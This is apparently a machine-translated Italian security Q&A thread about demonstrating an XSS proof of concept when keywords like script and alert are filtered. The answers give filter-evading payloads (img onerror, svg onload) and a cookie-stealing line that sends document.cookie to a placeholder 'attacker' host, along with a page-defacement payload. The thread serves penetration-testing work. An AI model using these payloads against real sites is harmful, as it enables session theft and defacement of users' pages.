Come mostrare popup XSS senza usare parole chiave di avviso e script?

3

Mi sono imbattuto in un campo che è vulnerabile a XSS. Accetta e contrassegna tuttavia le parole chiave script, alert, msgbox, prompt sono bloccati. Ho provato ogni versione codificata di queste parole chiave ma non funziona.

C'è un modo in cui posso mostrare un POC (popup XSS) senza usare le parole chiave sopra.

Ho iniettato un frame con successo e anche i cookie non sono solo HTTP.

    
posta AJINKYA 17.07.2013 - 14:50
fonte

2 risposte

2

Nessun utente malintenzionato userà mai alert() , il controllo per questo all'interno di una stringa di attacco è più di una perdita di tempo, dimostra che lo sviluppatore non capisce come viene attaccato il software.

Potresti mostrare un attacco del mondo reale, in cui leggi un token CSRF o il valore document.cookie :

document.write("<img src=http://attacker/cookie_theif?c="+document.cookie+" />")

Potresti anche riscrivere la pagina, questa potrebbe essere usata per trasformare la pagina in una pagina di fasi:

document.body.innerHTML="owned:"+document.cookie
    
risposta data 17.07.2013 - 18:12
fonte
-1
<img src=x onerror=confirm(String.fromCharCode(88,83,83))>

Se il sito utilizza SVG come immagini, puoi utilizzare questo:

<svg onload=prompt(1)>

Nessuna <script> , alert , msgbox e o prompt parola necessaria.

    
risposta data 05.07.2016 - 14:22
fonte

Leggi altre domande sui tag